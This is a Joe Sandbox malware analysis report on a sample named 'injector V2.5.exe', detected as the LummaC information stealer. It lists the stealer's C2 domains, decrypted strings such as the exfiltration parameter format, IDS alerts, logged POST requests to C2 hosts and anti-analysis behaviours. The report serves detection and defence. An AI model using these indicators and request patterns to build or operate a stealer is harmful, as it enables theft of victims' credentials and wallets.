Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
injector V2.5.exe

Overview

General Information

Sample name:injector V2.5.exe
Analysis ID:1560308
MD5:96f89e1cb2a8789acee8720d872b4cc5
SHA1:03e6c31a56329ac737de81a43c9b8b9266fd31a3
SHA256:313d44650a5c5c542bbbcae9d17c03cc0981642b1450a092bfa95956bbead114
Tags:exeuser-4k95m
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • injector V2.5.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\injector V2.5.exe" MD5: 96F89E1CB2A8789ACEE8720D872B4CC5)
    • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • injector V2.5.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\injector V2.5.exe" MD5: 96F89E1CB2A8789ACEE8720D872B4CC5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "revirepart.biz", "peepburry828.sbs"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1849649478.00000000033E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: injector V2.5.exe PID: 4928JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: injector V2.5.exe PID: 4928JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: injector V2.5.exe PID: 4928JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:01.849846+010020283713Unknown Traffic192.168.2.449733104.21.43.198443TCP
              2024-11-21T16:53:04.773518+010020283713Unknown Traffic192.168.2.449734172.67.206.172443TCP
              2024-11-21T16:53:07.304425+010020283713Unknown Traffic192.168.2.449735172.67.206.172443TCP
              2024-11-21T16:53:09.637707+010020283713Unknown Traffic192.168.2.449736172.67.206.172443TCP
              2024-11-21T16:53:11.904443+010020283713Unknown Traffic192.168.2.449737172.67.206.172443TCP
              2024-11-21T16:53:14.238396+010020283713Unknown Traffic192.168.2.449738172.67.206.172443TCP
              2024-11-21T16:53:17.118224+010020283713Unknown Traffic192.168.2.449740172.67.206.172443TCP
              2024-11-21T16:53:19.296454+010020283713Unknown Traffic192.168.2.449744172.67.206.172443TCP
              2024-11-21T16:53:22.158221+010020283713Unknown Traffic192.168.2.449746172.67.206.172443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:02.533163+010020546531A Network Trojan was detected192.168.2.449733104.21.43.198443TCP
              2024-11-21T16:53:05.490496+010020546531A Network Trojan was detected192.168.2.449734172.67.206.172443TCP
              2024-11-21T16:53:08.044029+010020546531A Network Trojan was detected192.168.2.449735172.67.206.172443TCP
              2024-11-21T16:53:22.898587+010020546531A Network Trojan was detected192.168.2.449746172.67.206.172443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:02.533163+010020498361A Network Trojan was detected192.168.2.449733104.21.43.198443TCP
              2024-11-21T16:53:05.490496+010020498361A Network Trojan was detected192.168.2.449734172.67.206.172443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:08.044029+010020498121A Network Trojan was detected192.168.2.449735172.67.206.172443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:02.928237+010020576971A Network Trojan was detected192.168.2.4582171.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:04.773518+010020576591Domain Observed Used for C2 Detected192.168.2.449734172.67.206.172443TCP
              2024-11-21T16:53:07.304425+010020576591Domain Observed Used for C2 Detected192.168.2.449735172.67.206.172443TCP
              2024-11-21T16:53:09.637707+010020576591Domain Observed Used for C2 Detected192.168.2.449736172.67.206.172443TCP
              2024-11-21T16:53:11.904443+010020576591Domain Observed Used for C2 Detected192.168.2.449737172.67.206.172443TCP
              2024-11-21T16:53:14.238396+010020576591Domain Observed Used for C2 Detected192.168.2.449738172.67.206.172443TCP
              2024-11-21T16:53:17.118224+010020576591Domain Observed Used for C2 Detected192.168.2.449740172.67.206.172443TCP
              2024-11-21T16:53:19.296454+010020576591Domain Observed Used for C2 Detected192.168.2.449744172.67.206.172443TCP
              2024-11-21T16:53:22.158221+010020576591Domain Observed Used for C2 Detected192.168.2.449746172.67.206.172443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:01.849846+010020576471Domain Observed Used for C2 Detected192.168.2.449733104.21.43.198443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:03.175291+010020576581Domain Observed Used for C2 Detected192.168.2.4619311.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:02.928237+010020576681Domain Observed Used for C2 Detected192.168.2.4582171.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:00.244535+010020576461Domain Observed Used for C2 Detected192.168.2.4654371.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T16:53:17.867851+010020480941Malware Command and Control Activity Detected192.168.2.449740172.67.206.172443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: injector V2.5.exeAvira: detected
              Source: https://librari-night.sbs/apirAvira URL Cloud: Label: malware
              Source: https://librari-night.sbs/t?Avira URL Cloud: Label: malware
              Source: https://librari-night.sbs/api~Avira URL Cloud: Label: malware
              Source: https://librari-night.sbs/OTAvira URL Cloud: Label: malware
              Source: https://librari-night.sbs/rAvira URL Cloud: Label: malware
              Source: https://revirepart.biz/apiAvira URL Cloud: Label: malware
              Source: 00000000.00000002.1695674213.000000000327A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "p3ar11fter.sbs", "revirepart.biz", "peepburry828.sbs"]}
              Source: injector V2.5.exeReversingLabs: Detection: 34%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.5% probability
              Source: injector V2.5.exeJoe Sandbox ML: detected
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: peepburry828.sbs
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: processhol.sbs
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: revirepart.biz
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: injector V2.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: injector V2.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4F680 FindFirstFileExW,0_2_00B4F680
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B4F731
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00B4F680 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B4F680
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 877F203Ah2_2_00442140
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then jmp eax2_2_0040C916
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx ebx, byte ptr [edi]2_2_0040DD2B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004251E0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004251E0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_00409D80
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3174E150h2_2_00440E40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000001A4h]2_2_0040A210
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx ebx, ax2_2_00439B70
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0040CF82
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h2_2_00441460
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F6E92F34h2_2_00440C90
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov eax, dword ptr [esi+4Ch]2_2_0040D4B9
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+09h]2_2_00409940
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+08h]2_2_00409940
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [edx], bl2_2_00409940
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h2_2_0042BD40
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then jmp eax2_2_0040CD42
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ebx, edi2_2_0043A5D0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then jmp eax2_2_0040C991
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edi, ecx2_2_0040E59B
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 9C142CDAh2_2_004411B0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then jmp eax2_2_0040CA52
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then inc eax2_2_004202F0
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 484CE391h2_2_00441A90
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov esi, eax2_2_00440300
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00401F10
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then lea eax, dword ptr [ebp+04h]2_2_0043A720
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then jmp ecx2_2_0043FF20
              Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov esi, eax2_2_0043FF20

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2057658 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs) : 192.168.2.4:61931 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49734 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:65437 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49735 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057668 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs) : 192.168.2.4:58217 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49737 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.43.198:443
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49738 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057697 - Severity 1 - ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs) : 192.168.2.4:58217 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49740 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49744 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49746 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49736 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.43.198:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.43.198:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.206.172:443
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: revirepart.biz
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Joe Sandbox ViewIP Address: 172.67.206.172 172.67.206.172
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.43.198:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 172.67.206.172:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.206.172:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RVW4WPQQS5P19VGZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LQFB2BLOIFOQ0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NPY4APXRH68ZC8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GNHDNTX4N2FH4O1BSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6J2TM4YGL5Q2TFMP95User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1136Host: librari-night.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: librari-night.sbs
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: revirepart.biz
              Source: global trafficDNS traffic detected: DNS query: processhol.sbs
              Source: global trafficDNS traffic detected: DNS query: librari-night.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: injector V2.5.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: injector V2.5.exe, 00000002.00000002.1929912011.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902650994.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1720545360.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1923653498.00000000033B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: injector V2.5.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
              Source: injector V2.5.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: injector V2.5.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: injector V2.5.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: injector V2.5.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
              Source: injector V2.5.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: injector V2.5.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: injector V2.5.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: injector V2.5.exeString found in binary or memory: http://ocsp.comodoca.com0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: injector V2.5.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
